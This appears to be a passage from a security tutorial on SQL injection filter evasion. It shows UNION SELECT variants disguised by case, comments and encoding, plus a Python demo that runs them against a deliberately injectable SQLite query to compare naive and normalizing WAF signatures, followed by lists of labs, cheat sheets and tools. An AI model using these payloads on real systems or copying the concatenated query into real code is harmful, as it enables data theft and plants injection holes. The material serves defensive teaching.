Polymorphic payloads vary their form on every attempt, changing encoding, case, whitespace or comment placement, while keeping the same meaning for the database parser.

admin' UNION SELECT null, null, null -- could be changed to:
admin' union select null, null, null --
admin'/**/union/**/select/**/null,null,null --
admin'/*!union*//*!select*/ null, null, null -- (MySQL executes the contents of /*! */ versioned comments; other engines treat them as ordinary comments)

Because each variant differs at the byte level, signature-based WAFs and IDS/IPS that match a fixed string miss them unless they normalize the input (decode, strip comments, collapse whitespace, fold case) before matching.
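To show why the evasions in this section work and what a detector has to do about them, here is an added Python example (not from the original page or from any WAF product): a naive signature applied to the raw parameter, the same signature applied after normalization (percent-decode, strip inline comments, collapse whitespace, fold case), and a simulated vulnerable SQLite backend that executes every variant. The signature, the table contents and the payload set are constructed for the example; the /*! */ versioned-comment variant is left out because SQLite does not support it.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed backend data for the example.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE products (id INTEGER, name TEXT, price TEXT)")
db.execute("INSERT INTO products VALUES (1, 'widget', '9.99')")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 'hunter2')")

# A typical fixed-string signature: case-sensitive, expects a literal space.
SIGNATURE = re.compile(r"UNION SELECT|' OR '1'='1")


def naive_waf_blocks(raw_param: str) -> bool:
    """Matches the signature against the parameter exactly as it arrived."""
    return SIGNATURE.search(raw_param) is not None


def normalise(raw_param: str) -> str:
    """What the WAF must do before matching: decode, drop comments, collapse
    whitespace and fold case, so that it sees what the SQL parser will see."""
    s = unquote(raw_param)
    s = re.sub(r"/\*.*?\*/", " ", s)   # /**/ inline comments act as whitespace
    s = re.sub(r"\s+", " ", s)
    return s.upper()


def normalised_waf_blocks(raw_param: str) -> bool:
    return SIGNATURE.search(normalise(raw_param)) is not None


def backend_rows(raw_param: str):
    """Simulated vulnerable backend: decodes the parameter and concatenates it."""
    sql = "SELECT name, price FROM products WHERE id = " + unquote(raw_param)
    return db.execute(sql).fetchall()


# The same UNION attack in four byte-level disguises.
PAYLOADS = {
    "plain":    "1 UNION SELECT username, password FROM users",
    "case":     "1 UnIoN SeLeCt username, password FROM users",
    "comments": "1/**/UNION/**/SELECT/**/username,password/**/FROM/**/users",
    "encoded":  "1%20UNION%20SELECT%20username,%20password%20FROM%20users",
}


def evaluate():
    """For each variant: (naive WAF blocks?, normalised WAF blocks?, rows the DB returns)."""
    return {name: (naive_waf_blocks(p), normalised_waf_blocks(p), backend_rows(p))
            for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (naive, normalised, rows) in evaluate().items():
        print(f"{name:9} naive={naive!s:5} normalised={normalised!s:5} rows={rows}")
```

Only the plain variant trips the naive signature, yet every variant makes the backend return the admin credentials alongside the product row; after normalization the same signature catches all four. The lesson for the defender is that matching must happen on the canonical form the parser sees, and even then a blocklist is a mitigation layer, not a substitute for parameterized queries.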

Writeups:
Exploiting an SQL injection with WAF bypass
5 Ways I Bypassed Your Web Application Firewall

16. SQL Injection and Application Security Testing

Web Application Testing for SQL Injection
SQL-Injection-Testing-Project
Input Validation Testing

Cheatsheets
PayloadsAllTheThings
Sql-injection-payload-list
Advanced-SQL-Injection-Cheatsheet

Hands-On Labs, Tools, and Resources

Interactive Labs

PortSwigger Web Security Academy A free resource with interactive SQLi labs covering all types and difficulties.

picoCTF Security challenges that include SQL Injection scenarios for all levels.

OverTheWire: Natas A CTF platform focusing on web application vulnerabilities, including SQL Injection.

TryHackMe SQL Injection Lab Beginner-friendly guided labs for learning and practicing SQLi.

Hack The Box Advanced challenges and machines vulnerable to SQLi and other exploits.

Dedicated Projects and Resources

SQLi Labs by Audi-1 A GitHub project with progressively harder SQLi challenges to master the skill.

Damn Vulnerable Web Application (DVWA) A web application intentionally vulnerable to SQLi and other attacks.

OWASP Juice Shop A modern application with vulnerabilities, including SQLi, for training purposes.

Vulnhub Pre-configured virtual machines vulnerable to SQLi and other web exploits.

Automation Tools for SQL Injection

  • SQLMap An open-source tool to automate SQL injection detection and exploitation.

  • NoSQLMap A tool specifically for NoSQL database injection and exploitation.

  • Burp Suite A robust web vulnerability scanner that includes tools for testing SQLi.

  • Havij A user-friendly tool for automating SQLi testing.

  • SQL Injection Scanner - Vega A web vulnerability scanner that can detect SQL injection vulnerabilities.

Books and Learning Resources

  • SQL Injection Attacks and Defense Comprehensive guide to understanding and mitigating SQL injection.

  • OWASP SQL Injection Cheat Sheet A concise reference for SQLi prevention techniques.

  • PentesterLab Paid and free resources to learn web application vulnerabilities, including SQLi.

  • CTF Learn Beginner-friendly CTF challenges focused on SQLi and other vulnerabilities.